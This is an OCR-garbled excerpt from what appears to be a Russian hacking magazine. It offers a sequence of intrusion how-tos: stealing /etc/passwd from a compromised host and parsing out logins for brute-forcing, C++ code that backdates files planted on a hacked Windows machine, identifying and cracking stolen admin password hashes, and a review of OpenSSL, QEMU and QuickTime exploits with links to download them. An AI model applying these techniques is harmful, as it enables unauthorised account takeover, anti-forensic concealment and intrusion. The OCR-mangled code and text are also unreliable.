темой защиты, что и удаленные нами ранее (какая система защиты создала 
ключи реестра, можноузнать, посмотрев в столбец Зузіепп списка ключей). 
Например, если мы ранее удаляли ключи и файлы, созданные протектором 
ѴВох.то удаляем все аналогичные. 

Чтобы не рвать на себе волосы, созерцая картину последствий удаления 
совершенно не относящихся к нашей программе ключей, рекомендую пе- 
ред выполнением действий установить галочку автосохранения: «Орбопз 
-> Аиіо Ьаскир». После этого для всех ключей будет создаваться бэкап в 
папке Васкир директории, где установлена программа Тгіаі-Резеі. 

Совет: чтобы не проводить часы в ожидании окончания сканирования 
системы на предмет всех известных программе навесных защит, стоит 
сузить область поиска. Для этого нам понадобится программа РЕІсІ, которая 
может определить тип защиты, используемый софтиной, илиже данные 
об используемом протекторе, которые несложно найти в интернете. Зная 
тип протектора, сканировать реестр можно уже толь ко на предмет ключей, 
созданных им («Ргоіесіогз -> имя_протектора -> Зсап»), 

Тгіаі-Резеі может понадобиться нетолько для оживлениятриальных про- 
грамм, но и при снятии протектора. Например, мне она очень помогла при 
снятии ѴВОХ’а с восьмого РНоіозіюр С5. 



№3 



(ЗАДАЧА: 



РА55ѴѴ0-ФАЙЛА. 

РЕШЕНИЕ: 

Представь себе такую ситуацию: ты получил шелл на крупном хостинге 
либо приобрел возможность чтения файлов на сервере, но твои права 
сильно ограничены, а хостинг очень большой и аппетитный. Что 
делать? :) Правильно — первым делом следует запустить РНР-брут по 
имеющимся аккаунтам. Как показывает практика, на збагесі -хости нгах 
очень распространены ламерообразные пароли, а значит, наши шансы 
достаточно велики :). Логины для брута мы будем сливать, естественно, 
из раззѵѵсі-файла. В от тут и возникает основной вопрос: как быстро и 
безболезненно отпрасить все логины пользователей из пары сотен 
строк, содержащих множество ненужной инфы (в виде путей до домаш- 
них каталогов и т. п .)? Начнем по порядку: 

1. Сливаем раззѵѵсі-файл с атакуемого сервера (если ты забыл, он нахо- 
дится по адресу /еіс/раззѵѵсі :)). 

2 . Пишем небольшой РНР-скрипт для парсинга слитого раззѵѵсі-файла: 

<? 

$Рп=Рореп ( "раззжі. ДхО " , "г" ) ; 

іб ( ! $Рп) есТю ( "Сап' О ореп раззжі. ДхО " ) ; 



} 

?> 

3. Перед запуском скрипта сохраняем все содержимое раззѵѵсі-файла в 
файл раззѵѵсі.іхі. 

4 . Запускаем наш скрипт с помощью РНР- интерпретатора и через 
несколько секунд забираем логины пользователей в Іодіпз.іхі :). 

Далее перед началом брута рекомендую скопировать все логины в 
раззѵѵогсі-лист и попробовать перебор по аккам вида логиншогин (то 
есть пароль равен логину). Мне не раз попадались подобные учетки, 
так что не сомневаюсь, что на крупном сервере повезет и тебе. В ка- 
честве брутера можно заюзать Гидру или ЕТР-Ьгиіег. Если ни первого, 
ни второго под рукой не окажется, поднимай подшивку ][, в одном из 
прошлых номеров я приводил пример ЕТР-брутера на РНР :). 



ѵтЫІе ( ! ТеоТ ( $Рп) ) { 

$пр = РдеРз ( $Рп) ; 

$зРг = зРггеѵ($пр) ; 

$1одіп = зиЬзРг ( зРггсЬг ( $зРг 1) ; 
$геѵ = зРггеѵ ( $1одіп) ; 

$ Рр = Рореп ( " Іодіпз . РхР " , " а " ) ; 

РриРз ( $Рр , " $геѵ\п" ) ; 

Рсіозе ( $Рр) ; 

} Рсіозе ( $Рп) ; 
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Откатим время назад :) 



СКРЫТЬ ВРЕМЯ СОЗДАНИЯ ЗАЛИТЫХ ФАЙЛОВ НА ВЗЛО- 
МАННОЙ ВИНДЕ. 

РЕШЕНИЕ: 

Напишем небольшую прогу, меняющую время создания и изменения 
наших файлов на параметры, не вызывающие никаких подозрений. 
Используем для этого АР I -функции, например, при помощи языка 
С++. 

1. Подключим заголовочный файл, содержащий описание этих функ- 
ций (хотя нас будут интересовать лишь некоторые из них): 

#іпс1ис!е <\ѵіпс!о\ѵз . Ъ> 

2 . Получим указатель (Ь_оиі) на файл и р Іоа сі есі . сіаР, параметры ко- 
торого необходимо изменить. Воспользуемся функцией С геаРе Рі Іе () 
с флагом О РЕ Ы_ЕХІ 8ТІ N Ѳ (таким образом, мы ничего не создаем, а 
открываем существующий файл на чтение): 
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НАШШ Ъ_оиЕ = СгеаЕеЕіІе ( " ЕехЕБ " , СЕЕЕКІС_МКІТЕ , 
ЕІЬЕ_ЗНАКЕ_КЕАБ, ШЬЬ , ОРЕЫ_ЕХІЗТШС , О, ШЬЬ); 

Файл необходимо открыть с правами доступа на запись (6ЕЫЕРІС_ 
ѴѴРІТЕ), иначе поменять время не удастся. 

3. Таким же образом получаем указатель на любой виндовый файл, стан- 
дартно создаваемый при установке. Для примера возьмем ехріогег.ехе: 

НАКГОЬЕ Ъ._іп = СгеаЕеЕіІе ( "С : \\ЖШОШЗ\\ехр1огег . ехе" , 
ОЕЫЕКІС_ШІТЕ , ЕІЬЕ_ЗНАЕЕ_ЕЕАБ , 

ШЬЬ, ОРЕН_ЕХІ5ТШС # О, ШЬЬ) ; 

4 . Существует структура РІІ_ЕТІМЕ, описанная в ѵѵіпЬазе.Н, которую мы и 
будем использовать для хранения данных о времени создания файла. 
Нам понадобятся три переменные этого типа: время создания, время 
открытия, время изменения. 

ЕІЬЕТІМЕ Ц_сгеаЕесІ; 

ЕІЬЕТІМЕ Ц_орепесІ; 

ЕІЬЕТІМЕ Ц_с]тапдесІ; 



5 . Получим время создания, открытия и изменения этого виндового 
файла, используя указатель (Н_іп) на предварительно открытый файл 
(ехріогег.ехе). 

СеЬЕіІеТіте (1т_іп, &Ь_сгеаЬес1, &Ь_орепесІ, &Е_с]тапдесІ) ; 

6 . Присвоим эти значения залитому на взломанный сервер файлу 
(иріоабеб.баі) через указатель на него (Н ои!) при помощи функции 
5еІ Рі ІеТі т е О : 

ЗеЬЕіІеТіте (1т_оиЬ , бсЕ-СгеаДесІ, &Ь_орепесЗ., &Ь_с]з апдесі) ; 

7 . Закроем открытые нами хэндлы файлов: 

СІозеНапсНе (1і_іп) ; 

СІозеНапсІІе (1т_оиЬ ) ; 

Готово. После выполненной работы не забываем удалить (спрятать) саму 
прогу в чужой Винде из соображений безопасности. В итоге мы получили 
такойже древний, покрытый пылью веков файл, каки сама Винда, при- 
том нас совершенно не интересовало, когда она была установлена. 
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АДАЧА 



НАИТИ ВСЕ ВХОДЯЩИЕ В ДВОИЧНЫЙ ФАЙЛ СТРОКИ, 
УДОВЛЕТВОРЯЮЩИЕ ОПРЕДЕЛЕННЫМ ТРЕБОВАНИЯМ, И СО- 
ХРАНИТЬ ИХ В ТЕКСТОВОМ ФАЙЛЕ. 

РЕШЕНИЕ: 



Эта задача может возникнуть в ходе совершенно разных работ. Напри- 
мер, может понадобиться найти серийный номер или его хэш, ссылку, 
по которой программа переходит для удаленной проверки валидности 
лицензии программы, и т.д. С такой работой, которую вручную выпол- 
нить крайне сложно, нам поможет справиться шестнадцатеричный 
редактор ѴѴІпНех. 

1. Запускаем ѴѴІпНех и открываем с его помощью исследуемый файл. 

2 . В меню выбираем «Зресіаііві СаШегіехІ». 

3. Задаем условия поиска. В поле Ресод піге ІехІ Ьу задаем минимальное 
количество идущих подряд символов, которое ѴѴІпНех будет считать 
текстом (рекомендую оставить стандартное значение — 7 символов). 
Устанавливаем флажки, которые определяют, что может включать в себя 
искомый текст: символы алфавита (Ееііегз), цифры (ЫитЬегв) или знаки 
препинания и пробелы (РипсІиаГоп тагкз апсі зрасев). Можно задать и 
направление поиска, и поддержку поиска II пісобе-сим волов. 

4 . Нажимаем 0 к, в открывшемся окне задаем имя файла, в который бу- 
дут сохранены все найденныетекстовые строки. После этого сообщаем 
программе размер создаваемого текстового файла и ждем результатов 
сканирования. 




ЗАДАЧА 



д СОХРАНИТЬ КАРТИНКУ И ЗВУК С ПОНРАВИВШЕГОСЯ 
РІ.А5Н-БАННЕРА. 

РЕШЕНИЕ: 



Существует множество прог для работы с ДазН-анимацией. Мы будем 
заниматься разборкой на части зѵѵі-файла, поэтому нас будут интере- 
совать НазИ-декомпилеры. Несмотря на их большой ассортимент, все 
они похожи, поэтому возьмем для примера ЗоіЬіпк 5ѴѴЕ Оесотрііег. 

1. Запускаем прогу. Интерфейс не русский, но это уже давно никого 
не пугает. Перетаскиваем баннер прямо из эксплорера в любое 
окно зѵѵі-сіесотрііег'а либо выбираем его в дереве каталогов 
проги. 



2 . Декомпилер начнет просматривать файл и разбирать его на 
составные части. При среднем размере файла этот процесс 
занимает не больше 3-5 секунд. Справа в древовидной структуре 
можно просмотреть любые элементы ролика, отсортированные 
по категориям: формы (ЗИаре), звуки (Зоипб), шрифты (Еопі), 
текст, спрайты (Зргііе), кнопки (ВіШоп), кадры (Егате), скрипты 
АсГопЗсгірІ (Асііоп). 

3. Открываем папку ЗИаре, содержащую статические изображе- 
ния. В ней ищем понравившуюся графику, напротив нужного изо- 
бражения ставим галочку. В случае отсутствия нужного рисунка, 
открываем каталог Зргііе, в котором собраны анимированные 
картинки. 

Возможно, тебе понравилось музыкальное оформление. Конеч- 
но, оно используется не так часто, но однозначно привлекает 
внимание. Все файлы ѵѵаѵ и трЗ, запакованные в зѵѵі-файл, будут 
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Потрошим чужой баннер 
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ЗАДАЧА 



ДОПРЕДЕЛИТЫИП АЛГОРИТМА 
ПО ВИДУ ХЭША ПАРОЛЯ 

РЕШЕНИЕ: 



В последнее время то и дело натыкаюсь на различных хак-форумах 
на топики с те мам и типа «Помогите определить алгоритм!» или «Чем 
зашифрован пасс?». С чем это связано? На самом деле здесь все доста- 
точно просто. Посуди сам, только модификаций одного МБ5 развелось 
немерено, а учитывая, что на большинстве движков пассы юзеров 
хранятся в базе в шифрованном виде, атакующему порой приходит- 
ся разгадывать недетскую головоломку. Итак, допустим, ты слил хэш 
пароля от админского аккаунта. Всетвои дальнейшие действия можно 
подогнать под следующий план: 

І.Определениеалгоритма (чем зашифрован пароль). 

2 . Брут слитого хэша. 

Как ты понимаешь, глупо начинать б рут, покаточноне убедишься в том, 
что ты на 1 00% правильно определил алгоритм шифрования. Поэтому 
первое, что мы сделаем, — рассмотрим наиболее распространенные 
алгоритмы (втом числе и модификации М й 5, применяющиеся в РНР- 
движках): 



перечислены в папке БоипсІ. Выбираем, прослушиваем, ставим 
галочки. В папке ВіШоп можно найти оформление кнопок и ссы- 
лок баннера. 

4 . Нужные элементы выбраны, в главном меню тыкаем «Рііе ^ 
Ехрогі» либо жмем <Р2>. Перед нами диалог экспорта. Проверяем 
настройки: в области Рііе ^огтаі напротив БЬаре ставим «РІазЬ 
(*.з\л/Д» р напротив БоипсІ — «БоипсІ (*.ѵѵаѵ; *.трЗ)», напротив 
Бргйе — «РІазЬ (*.з\л/Я», напротив Виііоп — «РІазЬ (*.з\л/Д». Оп- 
ределяем папку, в которую будут скопированы нужные картинки и 
звук, и жмем ЕхрогР 

5 . Работа с зѵѵі-декомпилером закончена. Мы имеем нужные нам 
изображения и анимацию в отдельных маленьких файлах формата 
зѵѵР Для перевода этих зѵѵМфайлов в привычный формат (іред, 
діф Ьтр ит.д.) используем любой специализированный зѵѵМ кон- 
вертер, например, для перевода в діі можно заюзать 5ѴѴР-АѴІ-6ІР 
Сопѵегіег. 

В от теперь идем пить пив... хм, то есть задача выполнена: мы 
получили графику и звук из НазЬ-баннера. 



МБ 4 — 4а4а963е47с7Ь8аЗЪ355е0е0с90сЮаа0 — мало где ис- 
пользуется, в основном для общего ознакомления : ) . 

МБ 5 (Бпіх) — $1$фте$рВтмВЪ8асК8Бббп1 БіббТІ — применяется 
при шифровании паролей пользователей в *піх-системах . 

МБ 5 (АРК) — $арг1$ф\ге$4ЕО8ЬУкТ12у0пБ0Б2с1зЦВ — здесь все 
просто, обрати внимание на ключевое слово арг в хэше. 

МБ 5 ( 12 8Ьіб — шб5 ( $разз ) ) - 97Р44Ы3955235245Ь249739967 
а93 — очень часто используемый алгоритм. 

МУ8()Б (б4Ьіб) — 5бб8аб1а05б9с04Ь — встречается в старом 
мускуле (<= 5-й версии) , брутится быстро и непринужденно 
:) • 

МУ30Б5 (ІбОЬіб) - е56а114692бе0бе073б9а1сМ68а00ееЪ970 
3 6361 — встречается в мускуле => 5-й версии, не дружит с 
брутом. 

ЗНА-1 (ІбОЬіб) - 60111889б67е1аеЪЪЗЗЪ8с12572835баЗЮ271 
78 — достаточно криптостойкий алгоритм. 

ЗНА-1 (НМАС ) — 152с1ееЗЬ7Ь74с8себ47ае9а8а1891сс49бЬ07еб 
ЗНА-1 (Вазеб4 ) - УВ8УіМ2++ии204™ЗѴуд12д 8С13д= 

ИСПОЛЬЗУЮТСЯ В РНР: 

шб5 ($разз) — а16себб1137300103Ь24абб01с94с8бс - много 
где, например в рНрЬЬ. 

тб5 (тб5 ($разз) ) - 63ее451939еб580е13с4Ьб10109б11б0 
— применяется в е107 . 

тб5 (шб5 ($разз) . $за1б) — ЗЬ6б224а09 815еЫ8се1а0Ьс9б2 82 6 
9е — применяется в ѵВиІІебіп. 

шб5 (тб5 ($за1б) .тб5 ($разз) ) — 231Ь7727еб471б3122е15бе19 
ОаЗЫбІ — применяется в ІРВ 2.х.х. 

зНаІ ( $изегпаше . $разз ) — ба3 9аЗее5ебЬ4Ь0б32 55Ме1956018 
90абб80709 

Послетого какты определил тип хэша и алгоритм шифрования, можно 
приступать к б руту. Среди софта выделю следующие утилы: 

1. ЗоЬп 1Ье Ріррег — отлично брутит пароли, шифрованные с помощью 
БЕБ-алгоритма. 

2. РаззѵѵогсІзРго — мастер на все руки, перебирает различные модифика- 
ции МБ5, МуЗСИ, 5Н А- 1 . 

Софта достаточно много, и каждый имеет свои особенности. Кроме 
того, советую запускать перебор на ломаных дедиках, поскольку 
напрягать сутками родной комп — неблагодарное занятие. Конечно, 
ты всегда можешь написать собственную утилу, в этом случае мыль 
мне, и, быть может, твой брутер окажется на страницах любимого 
журнала :1. т 
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ОБЗОР эксплойтов 



ПОСЛЕДНИЙ МЕСЯЦ ПРИНЕС БОГАТЫЙ УРОЖАЙ КРИТИЧЕСКИХ ОШИБОК САМОГО РАЗНОГО КАЛИБРА, 
ФОРМ-ФАКТОРА И ТИПОРАЗМЕРА, ПОРАЗИВШИХ В ТОМ ЧИСЛЕ И ІЛЧІІХ С ОРЕИВБО (ЧЕГО УЖЕ ДАВНО НЕ 
СЛУЧАЛОСЬ). НО, КАК ВОДИТСЯ, САМЫЕ СОЧНЫЕ ДЫРЫ ТРАДИЦИОННО СОЗРЕВАЮТ В ВИСТЕ И ХРЮШЕ, 
КОТОРЫМ ПОСВЯЩЕН НАШ СЕГОДНЯШНИЙ РІЛ_І_ ОІБСЬОБЕ, ПРИПРАВЛЕННЫЙ ТРОЙКОЙ БОЛЕЕ МЕЛКИХ 
УЯЗВИМОСТЕЙ. 



01 

55І__ѲІ 
СІРНЕК5 



0РЕЫ55І.: 

ПЕРЕПОЛНЕ- 
НИЕ БУФЕРА 
СЕТ 5НАРЕ0 



>> Вгіе* 



| В конце ноября 2007 
года на хакерских форумах появи- 
лись многочисленные сообщения 
о переполнении буфера в функции 
ЗЗЕ_6еі_ЗЬагесІ_СірЬег5(), входя- 
щей в состав популярной библи- 
отеки 0реп55І_ и затрагивающей 
практически все операционные 
системы по ОрепВЗО включи- 
тельно. Остается только выяснить, 
насколько серьезен вектор атаки. 




Исправленная библиотека 
0реп55І_ на СѴ5 



Зерно раздора было брошено в поч- 
ву еще за год до этого, когда Таѵів 
Огтапбу и ѴѴіІІ йгеѵѵгу из боодіе 
ЗесигііуТеат обнаружили ошибку 
переполнения в сабжевой функции 
[ Ьир://зесипМосиз.сот/Ыс1/20249 ). 
которую разработчики 0реп55І_ 
мужественно устранили, выпустив 
обновленные версии ОрепЗЗІ 
0.9.71/0.9.86. Спустя некоторое 
время о дыре всезабыли. Все, 
кромехакера по имени Могііг Ообеіі;, 
обратившего внимание на то, что 
при определенных обстоятельствах 
переполнение все-таки происходит, 
передавая управление збеіі-коду. 
Что же это за обстоятельства такие? 



Рассмотрим фрагмент файла 
55 1/ 55 1 И Ь . С : 

р=ЪиТ ; 

зк=з->зеззіоп->сірЬегз ; 
бог (і = 0; 

і<зк_38Ь_СІРНЕК_пиш(зк) ; 

і + +) 

{ 

/* Бесгешепк бог еібкег 
бЬе ' : ' ог а ' \0 ' */ 

Іеп— ; [4] 
с = зк_ЗЗЬ_СІРНЕК_ 
ѵаіие (зк, і) ; 

бог (ср=с->паше; *ср; ) 

{ 

іб (Іеп-- <= 0) [1] 

{ 

р= ' \ 0 ' ; [5] 
гебигп (Ьиб) ; 

} 

еізе * (р++ ) = 

* ( ср++ ) ; [2] 

} 

* (р ++ ) = ' : ' ; [3] 

} ; 



р[-1]='\0' ; 

гебигп (Ьиб ) ; 



внешний цикл, уменьшаем Іеп на 
единицу еще раз итутже выполняем 
проверку на равенство нулю, после 
чего функция возвращает буфер с 
незавершенным нулем с последу- 
ющим переполнением и передачей 
управления на зЬеІІ-код. 



>> ТагдеІ5| 



Уязвимы практически все Ыпих- и 
хВЗО-системы, включающие в себя 
библиотеку ОрепЗЗІ с версии 0.9.7 
по версию 0.9. 8е включительно (в 
этот список попадает и ОрепВЗО 4.0, 
и ЕгееВЗй 6.2, ит.д.). 



>> ЕхрІоіі| 



Теперь перейдем оттеории к 
практике. Что мешает нам написать 
боевой эксплойт? Во-первых, необ- 
ходимо приложение, явным образом 
вызывающее функцию 55Е_0еі_ 
5Ьаге6_СірЬегв(), изначально пред- 
назначенную для отладочных целей 
и потому не слишком популярную. 
Во-вторых, поскольку процедура 
«рукопожатия» (ИапбзИаке) не 
вызывает этой функции, мы должны 
найти способ послатьспециальным 
образом сконструированные строки 
как серверу, так и клиенту. В-треть- 



их, мы должны иметь доступ к55І_- 
приложению как на клиенте, так и на 
сервере, где оно обычно запущено 
с повышенными привилегиями и до 
которого там просто не добраться. 



>> Боіиііоп 



Производители библиотеки 
ОрепЗЗІ оперативно отреагирова- 
ли на сообщение об уязвимости, ис- 
правив ошибку в версии ОрепЗЗІ 
0_9_8-зіаЫе, доступной на СѴ5 и 
вышедшей 1 9 октября 2007 года, 
то есть всего спустя 1 3 дней после 
уведомления одыре. Разработчики 
операционных систем также не ос- 
тались в стороне и выложили патчи, 
которые, впрочем, можно не качать, 
поскольку особой опасности нет. 

ОЕМи: 

ЛОКАЛЬНЫЙ 
ОТКАЗ В 
ОБСЛУЖИВАНИИ 




>> Вгіе{ 



| 30 ноября 2007 года юный 
(ноуже продвинутый) новозе- 
ландский хакер по имени ТеІеМап 
обнаружил ошибку в популярном 
эмуляторе ОЕМІІ [ ШрѴЛаЬгісе. 
ЬекагсІЧгееЧг/дети ). распростра- 



Древняя уязвимость исправлена 
строкой [1], но сильно лучше от 
этого не стало. Заполним буфер 
шифруемой строкой стаким рас- 
четом, чтобы Іеп == 1 , а ср указывал 
на конец строки. Тогда в последнем 
проходе цикла бог() переменная 
Іеп обратится в ноль, записывая 
последний байт строки в шифро- 
буфер [2], увеличивая указатель на 
единицу. Затем этотбайтзаполня- 
ется символоми-разделителями 
«:», а указатель р уменьшается на 
единицу для записитерминатора 
\0. Еслиже шифрование на этом не 
кончается, мы возвращаемся во 
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взлом 



» 




дать, чем послать в /сіеѵ/пиі. То есть 
послать-то их, конечно, можно, 
но они все равно не уйдут. Короче 
говоря, существуеттысяча и одна 
причина для сокрытия своего поч- 
тового адреса от посторонних глаз. 
Нотакли этотмеханизм надежен и 
можно ли ему доверять? Оказы- 
вается, что нет, и я столкнулся с 
вполнетипичной ошибкой, которую 
встречал уже не раз и даже не два, 
а очень много раз, и наконец решил 
ее описать, чтобы: 



адресованного жертве (здесьоно не 
показано): 

РАСКРЫТИЕ ПОДЛИННОГО 
ПОЧТОВОГО АДРЕСАЖЕРТВЫ 

Ні . Ткіз із кЬе «дтаіі-зепсі 
ргодгат ак зуз145 . 3 кп . 
пек . 

І'т акгаісі I ѵѵазп'к аЫе 
До (Зеііѵег уоиг шеззаде До 
кЬ.е коііоміпд асМгеззез . 
Тітіз із а регтапепк еггог; 
І'ѵе діѵеп ир. Зоггу ік 
бісіп'к ѵ\гогк оик . 



няемом в исходныхтекстах на 
бесплатной основе и портирован- 
ном на множество различных плат- 
форм. Дефект реализации буфера 
трансляции машинных команд (в 
исходныхтекстах он обозначен как 
Тгапзіаііоп Віоск ЬиЛег) приводит 
к возможности переполнения с 
передачей управления збеіі-коду 
или к банальному отказу в обслу- 
живании, что хоть и не смертель- 
но, но все же весьма неприятно. 
Подробности на ѵѵѵѵѵѵ.зесигіМосиз. 
сот/ЬісІ/26666 . 



|>> Тагдеі| 



В настоящее время уязвимость 
подтверждена в версии 0.9. Про 
остальные пока ничего не известно, 
но есть все основания полагать, что 
онитакже уязвимы. 



|>> Ехріоид 



Демонстрационный ргооі-оі- 
сопсері ехріоіі (с романтическим 
названием 511 N ОР А ВЕАСН), 
вызывающий отказ в обслужи- 
вании, можно скачать по адресу 
ѵѵѵѵѵѵ.зесигіМосиз.сот/сІаІа/ 
ѵиІпегаЬІІІІІез/ехрІоіІз/Збббб-дети- 
боз.гаг . Как мы видим, он пред- 
ставляетсобой гаг-архив размером 
970 байт, распаковав который, мы 
обнаружим согш-файл в 2560 байт. 
На самом деле это никакой не сот, 
а самый настоящий ехе, причем, 
если быть предельно корректным, 
ѵѵі п32- РЕ. Как известно, системный 
загрузчик не различает расшире- 
ний и ему все равно. Хоть сот, хоть 
ехе. Ладно, грузим этот РЕ в дизас- 
семблер и видим, что он упакован 
ІІРХ’ом. Незлобно материмся, 
берем последнюю версию ІІРХ (бес- 
платную, кстати) и распаковываем 
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файл путем указания ключа ‘-б’ (от 
сіесотргеззіоп) в командной стро- 
ке. Размер эксплойта немедленно 
увеличивается аждо 1 056 768 байт. 
Хвостом чую — тут что-то не то, но не 
будем делать поспешных выводов, 
а загрузим файл в дизассемблер. В 
итоге мыувидим огромное (40000Ы 
количество команд «раббзЬ хтті , 
хтт2» (сложение с насыщением 
знаковых упакованных байт), за ко- 
торыми следует вызов диалогового 
окна с надписью «РаззесІ» — тест 
пройден. Ну, это на живом ЦП он 
пройден, а у эмулятора эксплойт 
конкретно рвет крышу и будет рвать 
до тех пор, пока разработчики его 
не пофиксят. 



>> Боіиііоп 



Решения проблемы в настоящее 
время не существует, и, выполняя 
потенциально опасный код на 
эмуляторе ОЕМІІ, мы легко можем 
превратиться из охотника в жертву. 



ЗАМОК 

БОЛИ: 

V ЧЦ/ ДОСТУП К 

ПОЛЬЗОВАТЕЛЬСКИМ 

ДАННЫМ 



» Вгіе* 



| Блуждая по Сети в 
поискахжратвы (то есть добы- 
чи, которая эту жратву и будет 
готовить), я натолкнулся на сайт 
раіпсазие.гц . содержащий раздел 
знакомств в довольно типичной для 
ВОЗМ-сайтов манере: отправить 
жертве письмо можнотолько через 
специальную форму, указав свой 
етаіі. Считается, что такой способ 
надежно страхует от спама и от 
разных маньяков, которые долбят 
настолько занудно, что им легче 



а) пользователи знали, 
что они далеко не всегда 
защищены; 

б) администраторы думали 
головой и тестировали дви- 
жок, просчитывая наперед 
все возможные ситуации. 



Ситуации бывают разные. Самая 
типичная из них: при попытке 
пересылки содержимого формы 




Парни из Зутапіес’а крошат Горя- 
щего Лиса 



конечному адресату его почтовый 
сервер отбивает письмо назад, 
поскольку считает, что это спам, 
и сайт-отправитель уже давно 
занесен в черный список. Теорети- 
чески код, обрабатывающий форму, 
должен уведомить отправителя, что 
его письмо не дошло до адресата 
и вообще не судьба, что в данном 
случае и происходит. Только вместе 
суведомлением о невозможности 
доставки в тело отбитого письма 
включается и сам целевой адрес 
жертвы, на который ей теперь можно 
писать без всякихтам форм и про- 
чих отчетностей. 

Пример ответа приведен ниже. Сна- 
чала идеттекст, сгенерированный 
роботом, затем — заголовок письма, 
отбитого почтовым сервером, и 
ниже — самотело сообщения, 



<казка2 004@таі1 . ги> : 
194.67.23.20 іаііесі аккег 
I зепк кЬ.е шеззаде. 

Кетоке кюзк заіб: 550 зраш 
шеззаде бізсагбеб . Ік уои 
ккіпк кЪ.ак кке зузкет із 
тізкакеп, ріеазе герогк 
бекаііз ко аЬизеОсогр. 
шаіі . ги 



АРРІ.Е 

СІШСКТІМЕ: 



>> Вгіе{ 



23 ноября 2007 года 
польский хакер по кличке Кгузііап 
Кіозкоѵѵзкі (также известный под 
кодовым именем И07) обнаружил 
дыру в Арріе ОиіскТіте Ріауег, а 
также всех его плагинах, цепля- 
ющихся кпопулярным браузерам 
и позволяющих реализоватьуда- 
ленную атаку путем заманивания 
жертвы на подконтрольный хакеру 
ѵѵеЬ-сервер. Обычно это осущест- 
вляется массированной рассыл- 
кой еппаіі’ов. Ошибка заключается 
в некорректной обработке поля 
Сопіепі-Туре в РТ5Р-заголов- 
ке и приводит к переполнению 
буфера с возможностью засылки 
зловредного зЬеІІ-кода. Парни из 
исследовательской лаборатории 
корпорации Зутапіес протестиро- 
вали демонстрационный эксплойт 
отКгузііап'а Кіозкоѵѵзкі, раскро- 
шив Горячего Лиса, Сафари, ІЕ 6/7, 
чем и подтвердили наличиедыры. 
Однако они крайне скептически 
отнеслись к возможности захвата 
управления, о чем и высказались 
в своем блоге ( ѵѵѵѵѵѵ.зѵтапіес. 
сот/епіегргізе/зесцгііѵ гезропзе/ 
ѵѵеЫод/2007/1 1/Обаѵ ехріоіі |дг 



► 045 










^ взлом 



РѴ» ЦвЬід ЕЭДю 

ВІ «I *| ІІЛІ ІІІ1ІІ ІіЛіі ІІ 2І ^ ДІІ!|т|»|н1с|^к[в]вЫ іі ЙВІ2І 



ЙедіЁ»Г5 СГт 














< 


< < 




С 


< 


< 




< 


1“ 

V 

! V 


ЕПК=0ОО00000 


77 


77 


77 


77 


?7 


77 


77 


77 77 


77 


77 


77 


77 


77 


21 


77 


[ ВК=ОО0(НШ0() 


77 


77 


77 


77 


77 


7? 


77 


77-77 


77 


77 


77 


77 


77 


77 


77 


РСХ-42426262 


77 


77 


77 


77 


77 


; п 


77 


77-77 


7? 


77 


77 


77 


77 


77 


77 


р[>К=7С90Э7П8 


: ЗВ 


60 


26 


04 


Р7 


4І 


04 


06-00 


00 


00 


Б8 


01 


00 


00 


00 


Р5Р=П01 2Р8П8 


: ВГ 


37 


90 


7С 


90 


Р9 


12 


00-Р8 


Р0 


13 


00 


ЯС 


Р9 


12 


00 


ЕВР=0О12РЭС8 


: 78 


Р9 


12 


00 


ЗВ 


37 


90 


7С-90 


Р9 


12 


00 


Р8 


Р0 


13 


00 


Е5І=О0ОШ00 


77 


77 


77 


77 


77 


77 


77 


77-77 


77 


77 


77 


77 


77 


77 


7? 


Р [) I = 0 00 00000 


77 


77 


77 


77 


77 


?? 


77 


7?-77 


7? 


77 


77 


77 


77 


77 


77 


РІР=4?4262І2 

№ 

Н Ьксоійіоп 
Н 


: ?? 


77 


7? 


77 


77 


7? 


77 


77-77 


77 


77 


77 


77 


77 


77 


7? 


оттз СНССЕ88. 


ѴІ0Ю1І0Н геасііпд 


[42424242Л 



































|Падение браузера при переполнении — изучение содержимого регистров (для вывода их в удобочитаемой форме на экран отладчика использовался 
[написанный на скорую руку платн)И 



арріе диіскІІ.ЫтП . Десятки хакеров со всего мира, засев за отладчики 
и компиляторы, доказали, что товарищи из Эутапіес’а кругом неправы 
и захват управления возможен не только на ХР 5Р2, но даже на Висте со 
всеми ее новомодными системами защитами. Эксплойты посыпались, 
как перезрелые мандарины с дерева! Подробности этого прецедента 
читай на ѵѵѵѵѵѵ.5есигіМоси5.сот/ЬісІ/26549 . 



|>> ТагдеІ5| 



Уязвимость подтверждена в версиях 7.2 и 7.3 Арріе ОиіскТіппе Ріауег, 
что затрагивает целый ряд браузеров: ІЕ 6/7, Горящего Лиса, Оперу, 
Сафари, а также некоторые другие программные продукты, работающие 
с потоковым видео через ОиіскТіппе Ріауег, например ЭесопсІ Ыіе Ѵіеѵѵег 
от компании Ыпбеп РезеагсЬ, Іпс. Операционные системы: ѴѴ2К/ХР 
5Р0/5Р1/5Р2/Ѵіз1а. 



|>> Ехріойа 



Имеется огромное количество эксплойтов: отузконаправленных (ата- 
кующих системы строго определенного типа) до универсальных, список 
которых с краткими комментариями приведен ниже: 

• Ыі:р://сІоѵѵпІоасІ5.5есигіІѵІ : оси5.сот/ѵиІпегаЬІІІ1:іе5/ехрІоіІ5/26549.рѵ 

— самый первый эксплойт от Кгузііап’а Кіовкоѵѵвкі, написанный на Пи- 
тоне и работающий на ХР 5Р2, вызывая крах браузера, больше никаких 
действий не производит и к то му же требует дописывания части НТМБ- 
кода для встраивания ОиіскТіте-объекта. 

• Ыір://5есигіІѵІоси5.сот/сІаІа/ѵиІпегаЬІІІІІе5/ехрІоіІ5/26549-дІ риЫіс. 
Іаг.дг — законченный рас к отУад’а КоЫпа (зкуЬоІейд гттаі І.согп) , включа- 
ющий в себя все необходимые файлы для атаки на браузер. Содержит 
зЬеІІ-код, пробивающий ХР 5 Р2 на пару с Ѵізіа. 

• Ыір://сІоѵѵпІоасІ5.5есигііѵІоси5.сот/ѵиІпегаЬІІІІІе5/ехрІоііз/26549-ипі2. 
ду — боевой эксплойт, написанный двумя хакерами — тиіз’ом и 
)аѵадиги1 999 — специально, чтобы позлить парней из Эутапіес, 
считающих, что захватуправления невозможен. Эксплойт работает на 
ХР 5Р2/Висте со всеми браузерами, убивая их путем принудительного 
завершения процесса (естественно, зЬеІІ-код может быть переписан). 

• ЬЛр://сІоѵѵпІоасІ5.5есигіІѵІосиз.сот/ѵиІпегаЬІІІІІе5/ехрІоіІз/26549-ипі. 
ду — первая редакция предыдущего эксплойта — сыраяиневполне 
уверенно работающая, но все же полезная для ознакомления. 

• Ы:1:р ://сі оѵѵп Іоа сіз. зес и гіііѵі'ос из . со т/ѵи Іп е га Ь і ІИ: і ез/ехр Іо 0:5/26549 . с 

